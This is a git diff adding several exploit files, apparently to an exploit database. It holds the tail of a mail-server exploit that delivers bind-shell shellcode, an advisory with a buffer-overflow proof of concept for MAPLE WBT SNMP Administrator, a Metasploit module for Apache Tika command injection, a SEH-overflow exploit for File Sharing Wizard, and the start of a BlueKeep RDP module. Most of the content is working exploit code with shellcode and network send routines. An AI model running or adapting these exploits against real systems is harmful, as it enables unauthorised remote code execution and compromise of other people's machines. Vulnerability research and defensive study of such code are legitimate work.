+    englishmansdentist+="AxUAoQBkAQBQUE5UABEATWUbAY9lONL9Sh+Sqr3OLJbRE6+1vb25Xm+LDSJKiEYp" + "\r\n"
+    englishmansdentist+="K7c97E3ZsZRi6vq8Wmxd7A7VmJCOg5quHEyLIoEXW7gBvxbXXobdFFpPGWYTB45a" + "\r\n"
+    englishmansdentist+="q3L++6SbC7tNUc4prLw3sGmyTU3m+igAAAAAAAMVAKEAZAEAUFBOVAARAE1IlH49" + "\r\n"
+    englishmansdentist+="LIxOuujhMNn5Nilk83X5+uA2QD3wW4lCGLapMXqPSTqfmAa7InAzzhUgYSSyqttJ" + "\r\n"
+    englishmansdentist+="hkFNU7HtjP6EnQNM8yF0nEEPtE1LKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUA" + "\r\n"
+    englishmansdentist+="oQBkAQBQUE5UABEATWVHFAbVz/14YPuy66hgbEKmpvvq890sVncdxVpkLdQ9OiPX" + "\r\n"
+    englishmansdentist+="r+SVXY7DVAKNhCcgz8bQJ2txlQnpb4GF1ijd6UIM6wtps2Thcey91kcY1emiVezX" + "\r\n"
+    englishmansdentist+="TsyPgoqRc4fabbKA+CmxwDZ1+ygAAAAAAAMVAKEAZAEAUFBOVAARAE1I1P0bNXjL" + "\r\n"
+    englishmansdentist+="lCxRX1HbmmzMpDuKpNc8J5fj5izoO6mXfCsvJGs93PxXUicXUiqjvoRZqhyNiFJD" + "\r\n"
+    englishmansdentist+="pgJbhIE8MrMXmVjOLOh6D+DjKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBk" + "\r\n"
+    englishmansdentist+="AQBQUE5UABEATWWLqwdc+zx8F6Q1gCxTRgoBmTEXaNC+OlLohgpq/jTkA17IutK+" + "\r\n"
+    englishmansdentist+="0yTPit6gmwIoJebP2OVGN+2MqhvYnjtEH4CTJB2eOi36Uz1wLvnrS1zNgN01GKA4" + "\r\n"
+    englishmansdentist+="/hjA0VtrGUoOOEsJXdCA/CgAAAAAAAMVAKEAZAEAUFBOVAARAE1IsrZI5Qw6hIZF" + "\r\n"
+    englishmansdentist+="50BkQfu4kNU2UHyZqNUKN8j2oOJLT9/hiqkRvSQWFSxYFuwk8b1yNV0Oi6VoMWJf" + "\r\n"
+    englishmansdentist+="nxfWMa0F23OLh9GKFXeLKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQ" + "\r\n"
+    englishmansdentist+="UE5UABEATWViul1AWOQK7KTKl2bPRrK0OGZQ8RpUwkFMT1kFJT5SJnaqhUpUo1zs" + "\r\n"
+    englishmansdentist+="mFyWS6D3fOZleczIZhRHHHbz+03j2DxnHk1mwEAPaKi0ciA/Pj6WHKzEFe+Rzi/I" + "\r\n"
+    englishmansdentist+="JCi4FMUqrxwxS0Qh/SgAAAAAAAMVAKEAZAEAUFBOVAARAE1I4AW/nrr7rBR+2ezE" + "\r\n"
+    englishmansdentist+="/LEix7JsCeavFz2JdHURV7fTxK2ncuOSm20gXdyZXZp0OEx9l9lBZJt5oK48Dq12" + "\r\n"
+    englishmansdentist+="3qX7drFNOpVtwcJ8KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5U" + "\r\n"
+    englishmansdentist+="ABEATWV8VaScU9Rd/aYQN3GSj2FCGFC4HfkDYky7jhH5cH9NlivkaxL7koAC9g4r" + "\r\n"
+    englishmansdentist+="hWomac+kmFE1hrLVzzU6m2AHr9acWTNBigT5SQ1J2EVmF4UFqypUdPIpC6JjKVz6" + "\r\n"
+    englishmansdentist+="rMLo4UUkKZ7c/igAAAAAAAMVAKEAZAEAUFBOVAARAE1IIie1Zf6EmRq/jeztmfMT" + "\r\n"
+    englishmansdentist+="06viejZUBTUPW0ddDE294y04sy0dKyUl9a6cPnuJ7gKaBp1yOhpUN/eubpg5RO5b" + "\r\n"
+    englishmansdentist+="3UvIeQ982MOQKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAA/bs=" + "\r\n"
+
+
+    #username = "r0ss1n1@r0ss1n1.com"
+    #password = "F!R#W$LL"
+
+    # bind shell port 373
+    bind =  "w00tw00t"
+    bind += "\xda\xc3\xd9\x74\x24\xf4\xba\xb2\xfa\x67\x2b\x5e\x33"
+    bind += "\xc9\xb1\x78\x31\x56\x19\x03\x56\x19\x83\xc6\x04\x50"
+    bind += "\x0f\x9b\xc2\x12\xf0\x64\x15\x47\x72\xa1\x1e\xf6\xb0"
+    bind += "\x5a\xdf\x07\xc7\x16\x4b\xd3\x58\x7b\x1c\xaa\xd3\x10"
+    bind += "\x6d\x33\x36\x6b\xc9\xef\xd9\x9f\x8e\xb1\x94\x18\x4f"
+    bind += "\x1a\xf7\xe9\x54\xf7\xa4\x61\x6f\xf7\x4a\x7a\x3c\xa4"
+    bind += "\x19\x2c\x91\x22\xe7\x1c\x2a\x34\xe8\x48\xd0\xf8\x63"
+    bind += "\x26\xb1\xb8\x0b\x0f\x55\x6b\x5f\xa1\x8d\xd8\xa0\xf6"
+    bind += "\x59\x70\xd9\x6b\xa6\x73\x33\xdf\xb1\xc3\xbd\xe0\x41"
+    bind += "\x38\x88\xb0\xbe\x89\x9b\xf5\x99\x48\xbc\x09\xcc\xe1"
+    bind += "\x10\xa5\x64\x49\xb3\xb5\x2a\x02\xe8\xba\xfa\xcc\xc8"
+    bind += "\xe9\x9f\x75\x2a\x24\x76\xc4\xd5\xc7\x89\x2e\x4a\x38"
+    bind += "\x76\x51\x07\xb2\xe7\xc9\x84\x50\xcb\x23\x55\x41\x5e"
+    bind += "\xbc\xaa\x6e\x49\x84\xaa\x6e\x75\xf4\xbd\x13\x8a\x04"
+    bind += "\x3e\x74\x02\xe1\x0f\xb4\x70\x62\x3f\x04\xf2\x26\xcc"
+    bind += "\xef\x56\xd2\x47\x9d\x7e\xd5\xe0\x28\x59\xd8\xf1\x01"
+    bind += "\x99\x7b\x72\x58\xce\x5b\x4b\x93\x03\x9a\x8c\xce\xee"
+    bind += "\xce\x45\x84\x5d\xfe\xe2\xd0\x5d\x75\xb8\xf5\xe5\x6a"
+    bind += "\x09\xf7\xc4\x3d\x01\xae\xc6\xbc\xc6\xda\x4e\xa6\x0b"
+    bind += "\xe6\x19\x5d\xff\x9c\x9b\xb7\x31\x5c\x37\xf6\xfd\xaf"
+    bind += "\x49\x3f\x39\x50\x3c\x49\x39\xed\x47\x8e\x43\x29\xcd"
+    bind += "\x14\xe3\xba\x75\xf0\x15\x6e\xe3\x73\x19\xdb\x67\xdb"
+    bind += "\x3e\xda\xa4\x50\x3a\x57\x4b\xb6\xca\x23\x68\x12\x96"
+    bind += "\xf0\x11\x03\x72\x56\x2d\x53\xdd\x07\x8b\x18\xf0\x5c"
+    bind += "\xa6\x43\x9d\x91\x8b\x7b\x5d\xbe\x9c\x08\x6f\x61\x37"
+    bind += "\x86\xc3\xea\x91\x51\x23\xc1\x66\xcd\xda\xea\x96\xc4"
+    bind += "\x18\xbe\xc6\x7e\x88\xbf\x8c\x7e\x35\x6a\x38\x76\x90"
+    bind += "\xc5\x5f\x7b\x62\xb6\xdf\xd3\x0b\xdc\xef\x0c\x2b\xdf"
+    bind += "\x25\x25\xc4\x22\xc6\x48\x60\xaa\x20\x20\x9a\xfa\xfb"
+    bind += "\xdc\x58\xd9\x33\x7b\xa2\x0b\x6c\xeb\xeb\x5d\xab\x14"
+    bind += "\xec\x4b\x9b\x82\x67\x98\x1f\xb3\x77\xb5\x37\xa4\xe0"
+    bind += "\x43\xd6\x87\x91\x54\xf3\x7f\x31\xc6\x98\x7f\x3c\xfb"
+    bind += "\x36\x28\x69\xcd\x4e\xbc\x87\x74\xf9\xa2\x55\xe0\xc2"
+    bind += "\x66\x82\xd1\xcd\x67\x47\x6d\xea\x77\x91\x6e\xb6\x23"
+    bind += "\x4d\x39\x60\x9d\x2b\x93\xc2\x77\xe2\x48\x8d\x1f\x73"
+    bind += "\xa3\x0e\x59\x7c\xee\xf8\x85\xcd\x47\xbd\xba\xe2\x0f"
+    bind += "\x49\xc3\x1e\xb0\xb6\x1e\x9b\xc0\xfc\x02\x8a\x48\x59"
+    bind += "\xd7\x8e\x14\x5a\x02\xcc\x20\xd9\xa6\xad\xd6\xc1\xc3"
+    bind += "\xa8\x93\x45\x38\xc1\x8c\x23\x3e\x76\xac\x61"
+
+    hellosend = "ehlo" + "\x0d\x0a"
+
+    userlogin = "USER " + username + "\r\n"
+    passlogin = "PASS " + password + "\r\n"
+
+
+    mailfrom = "mail from: " + fromaddr + "\r\n"
+    mailto = "rcpt to: " + toaddr + "\r\n"
+
+    maildata = "data" + "\r\n"
+
+    crash ="From: <" + fromaddr + ">" + "\r\n"
+    crash+="To: <" + toaddr + ">" + "\r\n"
+    crash+="Subject: hi" + "\r\n"
+    crash+="Date: Wed, 27 Feb 2008 15:47:31 -0500" + "\r\n"
+    crash+="MIME-Version: 1.0" + "\r\n"
+    crash+="Content-Type: multipart/mixed;" + "\r\n"
+    crash+="\x09boundary=\"----=_NextPart_000_0003_01C87958.1024A8A0\"" + "\r\n"
+    crash+="X-Priority: 3 (Normal)" + "\r\n"
+    crash+="X-MSMail-Priority: Normal" + "\r\n"
+    crash+="X-Mailer: Microsoft Outlook, Build 10.0.19201" + "\r\n"
+    crash+="Importance: Normal" + "\r\n\r\n"
+    crash+="This is a multi-part message in MIME format." + "\r\n\r\n"
+    crash+="------=_NextPart_000_0003_01C87958.1024A8A0" + "\r\n"
+    crash+="Content-Type: application/octet-stream;" + "\r\n"
+    crash+="\x09name=\"egg.dat\"" + "\r\n"
+    crash+="Content-Transfer-Encoding: 8bit" + "\r\n"
+    crash+="Content-Disposition: attachment;" + "\r\n"
+    crash+="\x09filename=\"egg.dat\"" + "\r\n\r\n"
+    crash+=bind + "\xCC" * 500
+    crash+="\r\n\r\n\r\n"
+    crash+="------=_NextPart_000_0003_01C87958.1024A8A0" + "\r\n"
+    crash+="Content-Type: application/ms-tnef;" + "\r\n"
+    crash+="\x09name=\"winmail.dat\"" + "\r\n"
+    crash+="Content-Transfer-Encoding: base64" + "\r\n"
+    crash+="Content-Disposition: attachment;" + "\r\n"
+    crash+="\x09filename=\"winmail.dat\"" + "\r\n\r\n"
+    crash+=englishmansdentist
+    crash+="\r\n\r\n\r\n"
+    crash+="------=_NextPart_000_0003_01C87958.1024A8A0" + "\r\n"
+    crash+="\r\n\r\n" + "." + "\r\n"
+    q = "QUIT" + "\r\n"
+
+
+
+
+    boom = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    boom.connect(('192.168.17.127', 25))
+    time.sleep(2)
+    boomresponse = boom.recv(1024)
+    time.sleep(2)
+    print(boomresponse)
+    boom.send(hellosend)
+    helloresponse = boom.recv(1024)
+    time.sleep(2)
+    print str(helloresponse)
+    boom.send(mailfrom)
+    time.sleep(2)
+    toresponse = boom.recv(1024)
+    print str(toresponse)
+    boom.send(mailto)
+    time.sleep(2)
+    fromresponse = boom.recv(1024)
+    print str(fromresponse)
+    boom.send(maildata)
+    time.sleep(2)
+    dataresponse = boom.recv(1024)
+    print str(dataresponse)
+    boom.send(crash)
+    time.sleep(6)
+    crashresponse = boom.recv(1024)
+    print str(crashresponse)
+    time.sleep(2)
+    boom.send(q)
+    qresponse = boom.recv(1024)
+    print str(qresponse)
+    boom.close()
+
+def trigger(username, password):
+    trigger = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    trigger.connect(('192.168.17.127', 110))
+    time.sleep(3)
+    triggerresponse = trigger.recv(1024)
+    print str(triggerresponse)
+    triggeruser = "USER " + username + "\r\n"
+    trigger.send(triggeruser)
+    time.sleep(3)
+    triggerresponseuser = trigger.recv(1024)
+    print str(triggerresponseuser)
+    triggerpass = "PASS " + password + "\r\n"
+    trigger.send(triggerpass)
+    time.sleep(3)
+    triggerresponsepass = trigger.recv(1024)
+    print str(triggerresponsepass)
+    triggerlist = "LIST" + "\r\n"
+    trigger.send(triggerlist)
+    time.sleep(3)
+    triggerresponselist = trigger.recv(1024)
+    print str(triggerresponselist)
+    triggertop = "TOP 1 0" + "\r\n"
+    trigger.send(triggertop)
+    time.sleep(3)
+    triggerresponsetop = trigger.recv(1024)
+    print str(triggerresponsetop)
+    triggerdel = "DELE 1" + "\r\n"
+    trigger.send(triggerdel)
+    time.sleep(3)
+    triggerresponsedele = trigger.recv(1024)
+    print str(triggerresponsedele)
+    triggerquit = "QUIT" + "\r\n\r\n"
+    trigger.send(triggerquit)
+    time.sleep(3)
+    triggerresponsequit = trigger.recv(1024)
+    print str(triggerresponsequit)
+    trigger.close()
+    return
+
+sendpayload("user@domain.com", "password", "to@domain.com", "from@domain.com");
+time.sleep(6)
+print "after second +OK egghunter is triggered"
+print "egghunter will search for tag, wait 40 seconds"
+trigger("to@domain.com", "password");
+time.sleep(40)
+print "bind shell on port 373"
+print "nc -nv [ip] 373"
\ No newline at end of file
diff --git a/exploits/windows/remote/47130.txt b/exploits/windows/remote/47130.txt
new file mode 100644
index 000000000..80da8707f
--- /dev/null
+++ b/exploits/windows/remote/47130.txt
@@ -0,0 +1,165 @@
+# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow
+# Author: hyp3rlinx
+# Discovery Date: 2019-07-17
+# Vendor Homepage: www.computerlab.com
+# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
+# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
+# Tested on OS: Windows
+# CVE: CVE-2019-13577
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
+[+] ISR: Apparition Security        
+ 
+
+[Vendor]
+www.computerlab.com
+
+
+[Product]
+MAPLE Computer WBT SNMP Administrator (Thin Client Administrator)
+v2.0.195.15
+
+https://www.computerlab.com/index.php/downloads/category/27-device-manager
+ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
+SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4
+
+The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients.
+This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol).
+Agents are built into the clients for remote management and configuration.
+
+
+[Vulnerability Type]
+Unauthenticated Remote Buffer Overflow Code Execution 0day
+
+
+[CVE Reference]
+CVE-2019-13577
+
+
+[Security Issue]
+SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987.
+This will overwrite data on the stack/registers and allow for control of the programs execution flow resulting in attacker supplied remote code execution.
+Authentication is not required for this exploit.
+
+This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code.
+When installing the vulnerable program if asks for a serial number just enter a value of "1" or something.
+Upon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin.
+Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp directory, make OS system files viewable in explorer to see them.
+
+e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp
+
+ASLR / SEH all set to False helping to make exploit more portable. 
+
+CALL EBX
+10008FB3   0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll)
+
+Stack dump:
+
+EAX 41414141
+ECX 0018FEFC
+EDX 0018FF10
+EBX 022DDA78 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ESP 0018FECC
+EBP 0018FEF4
+ESI 0018FF10
+EDI 0018FEFC
+EIP 41414141
+C 0 ES 002B 32bit 0(FFFFFFFF)
+P 1 CS 0023 32bit 0(FFFFFFFF)
+A 0 SS 002B 32bit 0(FFFFFFFF)
+Z 0 DS 002B 32bit 0(FFFFFFFF)
+S 0 FS 0053 32bit 7EFDD000(FFF)
+T 0 GS 002B 32bit 0(FFFFFFFF)
+D 0
+O 0 LastErr ERROR_NO_SCROLLBARS (000005A7)
+EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
+
+
+
+[Exploit/POC]
+from socket import *
+import struct,sys,argparse
+
+#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
+#CVE-2019-13577
+#Remote Buffer Overflow 0day
+#hyp3rlinx - ApparitionSec
+
+#Pop calc.exe Windows 7 SP1
+sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
+"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
+"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
+"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
+"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
+
+eip = struct.pack("<L", 0x10008fb3)      #JMP EBX
+popebx = struct.pack("<L", 0x022C0012)   #5B POP EBX
+
+buf0="B"*693704 
+buf1=eip
+buf2=popebx+sc+"R"*899+"W"*23975 
+payload=buf0+buf1+buf2
+
+def doit(IP,payload):
+    try:
+        s=socket(AF_INET, SOCK_STREAM)        
+        s.connect((IP, 987))
+        s.send(payload)
+        print "CVE-2019-13577 - WBT SNMP Administrator Buffer Overflow 0day."
+        print "hyp3rlinx"
+        s.close()
+    except Exception as e:
+        print str(e)
+
+def parse_args():
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-i", "--ipaddress", help="IP of Target CVE-2019-13577")
+    return parser.parse_args()
+
+def main(args):
+    doit(args.ipaddress,payload)
+
+
+if __name__ == "__main__":
+    if not len(sys.argv) > 1:
+        print "[*] No args supplied see Help -h"
+        exit()
+    main(parse_args())
+
+
+
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=THMqueCIrFw
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: July 10, 2019
+Second vendor notification attempt: July 13, 2019
+No vendor replies.
+July 17, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/remote/47208.rb b/exploits/windows/remote/47208.rb
new file mode 100755
index 000000000..07596488c
--- /dev/null
+++ b/exploits/windows/remote/47208.rb
@@ -0,0 +1,123 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Tika Header Command Injection',
+      'Description'    => %q{
+          This module exploits a command injection vulnerability in Apache
+        Tika 1.15 - 1.17 on Windows.  A file with the image/jp2 content-type is
+        used to bypass magic bytes checking.  When OCR is specified in the
+        request, parameters can be passed to change the parameters passed
+        at command line to allow for arbitrary JScript to execute. A
+        JScript stub is passed to execute arbitrary code. This module was
+        verified against version 1.15 - 1.17 on Windows 2012.
+        While the CVE and finding show more versions vulnerable, during
+        testing it was determined only > 1.14 was exploitable due to
+        jp2 support being added.
+      },
+      'License'        => MSF_LICENSE,
+      'Privileged'     => false,
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Windows',
+            {'Arch' => [ARCH_X86, ARCH_X64],
+            'Platform' => 'win',
+            'CmdStagerFlavor' => ['certutil']
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 25 2018',
+      'Author' =>
+        [
+          'h00die', # msf module
+          'David Yesland', # edb submission
+          'Tim Allison' # discovery
+        ],
+      'References' =>
+        [
+          ['EDB', '46540'],
+          ['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
+          ['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
+          ['CVE', '2018-1335']
+        ]))
+
+    register_options(
+      [
+        Opt::RPORT(9998),
+        OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [true, 'Override check result', false])
+      ])
+  end
+
+  def check
+    res = send_request_cgi({
+             'uri'    => normalize_uri(target_uri),
+           })
+    if res.nil?
+      vprint_error('No server response, check configuration')
+      return CheckCode::Safe
+    elsif res.code != 200
+      vprint_error('No server response, check configuration')
+      return CheckCode::Safe
+    end
+
+    if res.body =~ /Apache Tika (\d.[\d]+)/
+      version = Gem::Version.new($1)
+      vprint_status("Apache Tika Version Detected: #{version}")
+      if version.between?(Gem::Version.new('1.15'), Gem::Version.new('1.17'))
+        return CheckCode::Vulnerable
+      end
+    end
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts = {})
+    cmd.gsub(/"/, '\"')
+    jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
+    jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"
+
+    print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
+    res = send_request_cgi({
+             'method' => 'PUT',
+             'uri'    => normalize_uri(target_uri, 'meta'),
+             'headers' => {
+                "X-Tika-OCRTesseractPath" => '"cscript"',
+                "X-Tika-OCRLanguage"      => "//E:Jscript",
+                "Expect"                  => "100-continue",
+                "Content-type"            => "image/jp2",
+                "Connection"              => "close"},
+             'data' => jscript
+           })
+
+    fail_with(Failure::Disconnected, 'No server response') unless res
+    unless (res.code == 200 && res.body.include?('tika'))
+      fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
+    end
+  end
+
+  def exploit
+    checkcode = check
+    unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
+      print_error("#{checkcode[1]}. Set ForceExploit to override.")
+      return
+    end
+
+    execute_cmdstager(linemax: 8000)
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/47412.py b/exploits/windows/remote/47412.py
new file mode 100755
index 000000000..4e3236a46
--- /dev/null
+++ b/exploits/windows/remote/47412.py
@@ -0,0 +1,80 @@
+import socket
+from struct import *
+
+# Exploit Title: File sharing wizard 'post' remote SEH overflow
+# Date: 9/23/2019
+# Exploit Author: x00pwn
+# Software Link: https://file-sharing-wizard.soft112.com/
+# Version: 1.5.0
+# Tested on: Windows 7
+# CVE : CVE-2019-16724
+
+# File-sharing-wizard-seh
+
+#----------------------------------------------#
+# Bad characters: \x00        #
+# SEH value:  0x909032EB  (JMP short)    #
+# NSEH value: 0x7c38a67f (POP POP RET)  #
+#----------------------------------------------#
+
+#  Assigned CVE ID : CVE-2019-16724
+
+victim_host = "10.0.0.17"
+victim_port = 80
+
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode EXITFUNC=seh
+shellcode =  ""
+shellcode += "\xd9\xc7\xd9\x74\x24\xf4\xba\x65\x1d\x84\xe1\x5f"
+shellcode += "\x29\xc9\xb1\x31\x31\x57\x18\x03\x57\x18\x83\xef"
+shellcode += "\x99\xff\x71\x1d\x89\x82\x7a\xde\x49\xe3\xf3\x3b"
+shellcode += "\x78\x23\x67\x4f\x2a\x93\xe3\x1d\xc6\x58\xa1\xb5"
+shellcode += "\x5d\x2c\x6e\xb9\xd6\x9b\x48\xf4\xe7\xb0\xa9\x97"
+shellcode += "\x6b\xcb\xfd\x77\x52\x04\xf0\x76\x93\x79\xf9\x2b"
+shellcode += "\x4c\xf5\xac\xdb\xf9\x43\x6d\x57\xb1\x42\xf5\x84"
+shellcode += "\x01\x64\xd4\x1a\x1a\x3f\xf6\x9d\xcf\x4b\xbf\x85"
+shellcode += "\x0c\x71\x09\x3d\xe6\x0d\x88\x97\x37\xed\x27\xd6"
+shellcode += "\xf8\x1c\x39\x1e\x3e\xff\x4c\x56\x3d\x82\x56\xad"
+shellcode += "\x3c\x58\xd2\x36\xe6\x2b\x44\x93\x17\xff\x13\x50"
+shellcode += "\x1b\xb4\x50\x3e\x3f\x4b\xb4\x34\x3b\xc0\x3b\x9b"
+shellcode += "\xca\x92\x1f\x3f\x97\x41\x01\x66\x7d\x27\x3e\x78"
+shellcode += "\xde\x98\x9a\xf2\xf2\xcd\x96\x58\x98\x10\x24\xe7"
+shellcode += "\xee\x13\x36\xe8\x5e\x7c\x07\x63\x31\xfb\x98\xa6"
+shellcode += "\x76\xfd\x69\x7b\x62\x6a\xd0\xee\xcf\xf6\xe3\xc4"
+shellcode += "\x13\x0f\x60\xed\xeb\xf4\x78\x84\xee\xb1\x3e\x74"
+shellcode += "\x82\xaa\xaa\x7a\x31\xca\xfe\x18\xd4\x58\x62\xf1"
+shellcode += "\x73\xd9\x01\x0d"
+
+nseh = pack ('<I',0x909032EB) # Short jump forward 32 places into NOP sled
+seh = pack('I',0x7c38a67f) # POP POP RET
+
+# 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
+# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files (x86)\File Sharing Wizard\bin\MSVCR71.dll)
+
+exploit_payload  = "A" * 1040
+exploit_payload += nseh # JMP short
+exploit_payload += seh # POPPOPRET
+exploit_payload += "\x90" * 100 # NOPSLED
+exploit_payload += shellcode # popping calc.exe
+exploit_payload += "D" *(5000 - len(exploit_payload))
+
+payload_header  = "POST " + exploit_payload
+payload_header +=" HTTP/1.0\r\n\r\n"
+
+# overflowed SEH handler - 42386942 : [*] Exact match at offset 1044
+
+try:
+print("""
+--------------------------------
+CVE-2019-16724 proof of concept
+File sharing wizard SEH overflow
+--------------------------------
+""")
+expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print("[x] Setting up a socket connection")
+expl.connect((victim_host, victim_port))
+print("[x] Establishing a connection to the victim")
+expl.send(payload_header)
+print("[x] Sending ")
+except:
+print("[!] Error establishing a connection")
+print("[!] Error sending exploit")
\ No newline at end of file
diff --git a/exploits/windows/remote/47416.rb b/exploits/windows/remote/47416.rb
new file mode 100755
index 000000000..c145ad49d
--- /dev/null
+++ b/exploits/windows/remote/47416.rb
@@ -0,0 +1,1122 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+#  Exploitation and Caveats from zerosum0x0:
+#
+#    1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.
+#    2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)
+#    3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.
+#    4. RDP has chunked messages, so we use this to groom.
+#       a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.
+#       b. However, on 7+, MS_T120 will not work and you have to use RDPSND.
+#           i. RDPSND only works when
+#              HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0
+#           ii. This registry key is not a default setting for server 2008 R2.
+#              We should use alternate groom channels or at least detect the
+#              channel in advance.
+#    5. Use chunked grooming to fit new data in the freed channel, account for
+#       the allocation header size (like 0x38 I think?). At offset 0x100? is where
+#       the "call [rax]" gadget will get its pointer from.
+#       a. The NonPagedPool (NPP) starts at a fixed address on XP-7
+#           i. Hot-swap memory is another problem because, with certain VMWare and
+#           Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP
+#           start. This can be anywhere from 100 mb to gigabytes of offset
+#           before the NPP start.
+#       b. Set offset 0x100 to NPPStart+SizeOfGroomInMB
+#       c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need
+#          [NPPStart+SizeOfGroomInMB+8...payload]... because "call [rax]" is an
+#          indirect call
+#       d. We are limited to 0x400 payloads by channel chunk max size. My
+#          current shellcode is a twin shellcode with eggfinders. I spam the
+#          kernel payload and user payload, and if user payload is called first it
+#          will egghunt for the kernel payload.
+#    6. After channel hole is filled and the NPP is spammed up with shellcode,
+#       trigger the free by closing the socket.
+#
+#    TODO:
+#    * Detect OS specifics / obtain memory leak to determine NPP start address.
+#    * Write the XP/2003 portions grooming MS_T120.
+#    * Detect if RDPSND grooming is working or not?
+#    * Expand channels besides RDPSND/MS_T120 for grooming.
+#        See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/
+#
+#    https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming
+#    MS_T120 on XP... should be same process as the RDPSND
+
+class MetasploitModule < Msf::Exploit::Remote
+
